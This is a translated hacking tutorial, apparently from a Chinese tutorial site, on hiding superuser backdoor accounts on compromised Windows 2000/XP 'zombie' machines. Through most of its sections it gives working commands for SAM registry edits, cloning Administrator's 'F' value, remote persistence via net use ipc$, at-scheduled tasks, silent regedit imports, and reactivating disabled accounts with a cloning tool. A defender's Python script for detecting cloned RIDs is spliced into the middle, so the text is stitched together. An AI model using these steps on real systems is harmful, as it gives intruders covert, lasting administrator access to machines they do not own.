Multiple methods to hide superusers in Win2000/XP

Source: Internet
Author: User
Tags: net time, superuser, permission

1. How to create a hidden superuser from the graphical interface

The graphical method applies to zombies you can reach locally or over 3389 Terminal Services. In my opinion, psu.exe is not needed here, because Windows 2000 has two registry editors, regedit.exe and regedt32.exe (in XP they are actually one program, and you can right-click a key and choose "Permissions" to change its permissions). Regedt32.exe can set permissions on registry keys, so on NT/2000 I grant myself "Full Control" on the SAM key; after that the information under the SAM key can be read and written. The steps are as follows:

1. Assume we have logged on to a zombie over Terminal Services as the superuser Administrator. First create an account, hacker$, either on the command line or in the account manager; here I create it on the command line:

net user hacker$ 1234 /add

2. Click Start > Run, enter regedt32.exe and run it.

3. Select the key HKEY_LOCAL_MACHINE\SAM\SAM and open "Permissions"; a dialog appears.

Click Add and add the account you are logged on with. I am logged on as Administrator, so I add Administrator and set its permission to "Full Control". Note: it is best to add only the account you are logged on with, or a group it belongs to, and not to modify the existing accounts or groups, otherwise a series of unnecessary problems may follow. The added account is removed again at the end.

4. Click Start > Run and enter regedit.exe to start the Registry Editor.

Open the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$

5. Export the keys hacker$, 00000409 and 000001F4 as hacker.reg, 409.reg and 1f4.reg. Open the exported files in Notepad, copy the value of "F" under the superuser's key 000001F4 over the value of "F" under key 00000409 (the key belonging to hacker$), then merge the edited 409.reg into hacker.reg.

6. Delete the user hacker$ from the command line: net user hacker$ /del

7. In the regedit.exe window press F5 to refresh, then use File > Import Registry File to import the modified hacker.reg into the registry.

8. The hidden superuser hacker$ has now been created. Close regedit.exe, then in regedt32.exe restore the original permissions on HKEY_LOCAL_MACHINE\SAM\SAM (you only need to remove the Administrator entry you added).

9. Note: after the hidden superuser is created, hacker$ is not visible in the account manager nor in the output of "net user" on the command line, but from then on its password can no longer be changed: if you change the password of hacker$ with net user, the hidden superuser becomes visible in the account manager and cannot be deleted.

2. How to remotely create a hidden superuser from the command line

Here we use the at.exe command, because tasks scheduled with at run under the System identity, so psu.exe is not needed. This method works as long as the Schedule service can be started.

On the command line you can use any kind of connection, for example sqlexec to port 1433 of MSSQL or the Telnet service; as long as you get a shell from which you can run the at command, it works.

1. First find a zombie; how to find one is not my topic here. Assume we have found one whose superuser is administrator with password 12345678. Now we can remotely create a hidden superuser on it from the command line. (In this example the host is on my own LAN; I have changed its IP address to 13.50.97.238. Please do not go looking for this host on the Internet, so as not to disturb whoever really has that address.)

2. First establish a connection with the zombie: net use \\13.50.97.238\ipc$ "12345678" /user:"Administrator"

3. Create a user on the zombie with the at command (if the Schedule service is not running, start it remotely with netsvc.exe or sc.exe); <time> is a time just after the zombie's clock, as in step 7:

at \\13.50.97.238 <time> c:\winnt\system32\net.exe user hacker$ 1234 /add

The username ends with $ because an account name ending in $ is not listed by net user on the command line, although it can still be seen in the account manager.

4. Use the at command to export the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users:

at \\13.50.97.238 <time> c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users

/e is regedit.exe's export switch. The key path HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users must be written out in full; if necessary, put the whole command in quotes: "c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users".

5. Copy hacker.reg from the zombie to the local machine and open it in Notepad for editing:

copy \\13.50.97.238\admin$\system32\hacker.reg c:\hacker.reg

How to edit it was already described in the graphical section, so I will not repeat it here.

6. Copy the edited hacker.reg back to the zombie: copy c:\hacker.reg \\13.50.97.238\admin$\system32\hacker1.reg

7. Check the zombie's time with net time \\13.50.97.238, then use the at command to delete the user hacker$:

at \\13.50.97.238 13:40 net user hacker$ /del

8. Verify that hacker$ has been deleted:

net use \\13.50.97.238 /del disconnects from the zombie.

net use \\13.50.97.238\ipc$ "1234" /user:"hacker$" connects to the zombie as hacker$. If the connection fails, the account has been deleted.

9. Reconnect to the zombie: net use \\13.50.97.238\ipc$ "12345678" /user:"Administrator"

After checking the zombie's time again, use the at command to import the hacker1.reg copied back in step 6 into the zombie's registry:

at \\13.50.97.238 13:41 c:\winnt\regedit.exe /s hacker1.reg

The /s switch of regedit.exe means silent mode.

10. Verify that hacker$ has been created, in the same way as you verified that it was deleted.

11. Verify that hacker$ has read, write and delete permissions. If you are still not at ease, you can also check whether it can create other accounts.

12. From step 11 we can conclude that hacker$ has superuser permissions: when I created it with the at command it was an ordinary user, but now it can read, write and delete remotely.

3. What if the zombie does not have 3389 Terminal Services enabled and I do not want to use the command line?

In that case you can still use the graphical tools to create a hidden superuser on the zombie remotely: regedit.exe can connect to and edit a remote registry, and the account manager can also connect to another computer, so you can use it to create and delete accounts on the remote host. The steps are similar to those described above, so I will not go into them, but the speed is really intolerable.

There are, however, two prerequisites: 1. First establish a connection to the remote host with net use \\<zombie IP>\ipc$ "password" /user:"<superuser name>", and only then connect regedit.exe, regedt32.exe and the account manager to the remote host.

2. The remote host must have the Remote Registry service running (if it is not running, you can start it remotely, since you have the superuser password).

4. Using a disabled account to create a hidden superuser: we can also turn a disabled user on a zombie into a hidden superuser. The method is as follows:

1. Find out which users a careful administrator has disabled. Usually some administrators disable guest for security reasons; of course other users may be disabled too. In the graphical interface this is easy to see: a disabled account has a red cross on it in the account manager. On the command line I have not found a good way; you can only run "net user <username>" for each user to check whether it is disabled.

2. Here we assume the user hacker has been disabled by the Administrator. First I use Xiao Rong's superuser clone program ca.exe to clone the disabled user hacker into a superuser (after cloning, the disabled user hacker is automatically activated): ca.exe <zombie IP> administrator <superuser password> hacker <password>

3. If you have a shell, for example through telnet or by connecting with sqlexec to the zombie's default MSSQL port 1433, run:

net user hacker /active:no

so that the user hacker is disabled again (at least on the surface). Of course you can also apply this to a different disabled user instead of hacker.

4. If you look at the user in the account manager, you will find that hacker is disabled, but is that really so? Use this disabled user to connect to the zombie and see whether it works: net use \\<zombie IP>\ipc$ "hacker password" /user:"hacker". I can tell you that in my many experiments it connected every time, and still with superuser privileges.

5. What if there is no shell? Use the at command described above to disable the user hacker. Format: at <zombie IP> <time> net user hacker /active:no

6. The principle: if you try to disable the superuser Administrator in the account manager, a dialog tells you that Administrator cannot be disabled. Similarly, cloning replaces the "F" key of hacker in the registry with the "F" key of the superuser Administrator, so hacker has the superuser's permissions; but because hacker still uses its original "C" key in the registry, hacker itself remains disabled while its superuser permissions are not, and so the disabled user hacker can still connect to the zombie with superuser permissions. I do not fully understand it myself either, but that is how I make sense of it.
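Every variant described above (sections 1, 2 and 4) leaves the same artefact in the SAM: a user key whose "F" value was copied from 000001F4, so the RID stored inside F no longer matches the key name. The following Python script, added here as a defender's check and not part of the original article, parses a regedit /e export of the Users key and flags such keys; it assumes the commonly documented F layout (RID at offset 0x30, account-control flags at 0x38) and runs on a constructed sample export, not real SAM data.

```python
import re
import struct

F_RID_OFFSET = 0x30     # 4-byte little-endian RID stored inside the binary F value
F_ACB_OFFSET = 0x38     # 2-byte account-control flags inside the same value
ACB_DISABLED = 0x0001   # flag bit set when the account is disabled
USER_KEY_RE = re.compile(r"\\SAM\\Domains\\Account\\Users\\([0-9A-Fa-f]{8})\]$")


def parse_f_values(reg_text):          # key RID -> F bytes, from 'regedit /e' text
    result, key_rid, buf = {}, None, None
    for line in (l.strip() for l in reg_text.splitlines()):
        if line.startswith("["):            # new key; only 8-hex-digit user keys count
            m = USER_KEY_RE.search(line)
            key_rid, buf = (int(m.group(1), 16) if m else None), None
        elif key_rid is not None and line.startswith('"F"=hex:'):
            buf = line[len('"F"=hex:'):]
        elif buf is not None:
            buf += line                     # wrapped continuation of the same value
        if buf is not None and buf.endswith("\\"):
            buf = buf[:-1]                  # drop regedit's line-continuation mark
        elif buf is not None:
            result[key_rid] = bytes(int(h, 16) for h in buf.split(",") if h)
            buf = None
    return result


def find_cloned_accounts(reg_text):
    """List (key RID, RID embedded in F, disabled flag) where the two RIDs differ."""
    hits = []
    for key_rid, f in parse_f_values(reg_text).items():
        if len(f) >= F_ACB_OFFSET + 2:
            f_rid = struct.unpack_from("<I", f, F_RID_OFFSET)[0]
            acb = struct.unpack_from("<H", f, F_ACB_OFFSET)[0]
            if f_rid != key_rid:
                hits.append((key_rid, f_rid, bool(acb & ACB_DISABLED)))
    return hits


def _fake_f(rid, acb):                   # constructed F value as regedit-style hex
    f = bytearray(0x50)                  # only the RID and flag fields are populated
    struct.pack_into("<I", f, F_RID_OFFSET, rid)
    struct.pack_into("<H", f, F_ACB_OFFSET, acb)
    return ",\\\n  ".join(",".join("%02x" % b for b in f[i:i + 25])
                          for i in range(0, len(f), 25))

# Constructed sample export (not real SAM data); key 0x409 holds Administrator's F.
SAMPLE_REG = "Windows Registry Editor Version 5.00\n\n" + "\n\n".join(
    '[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\%08X]\n"F"=hex:%s'
    % (key, _fake_f(rid, acb))
    for key, rid, acb in [(0x1F4, 0x1F4, 0x0010), (0x1F5, 0x1F5, 0x0011),
                          (0x409, 0x1F4, 0x0010)])
```

Run find_cloned_accounts on a real export to get the list of suspect keys; an honest account always reports its own RID.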

5. Notes:

1. After a hidden superuser is created, the user is invisible in the account manager and on the command line, but it does exist.

2. After a hidden superuser is created, its password cannot be changed, because doing so exposes the hidden superuser in the account manager, where it cannot be deleted.

3. When testing on your own machine, it is best to first back up the "System State" with the system's built-in backup tool; this is mainly a registry backup. In my own test the account manager stopped showing any users, and the group list no longer showed any groups, although they all still existed. Fortunately I had a backup. The SAM key is, after all, the most sensitive part of the system.

4. This method was tested successfully on 2000/XP; it was not tested on NT.

Note: this method is for research purposes only. Do not use it to cause damage. Users bear the responsibility for any serious consequences of using it; I am not responsible.

This article is from: dynamic website production (www.knowsky.com). Detailed reference: http://www.knowsky.com/339373.html
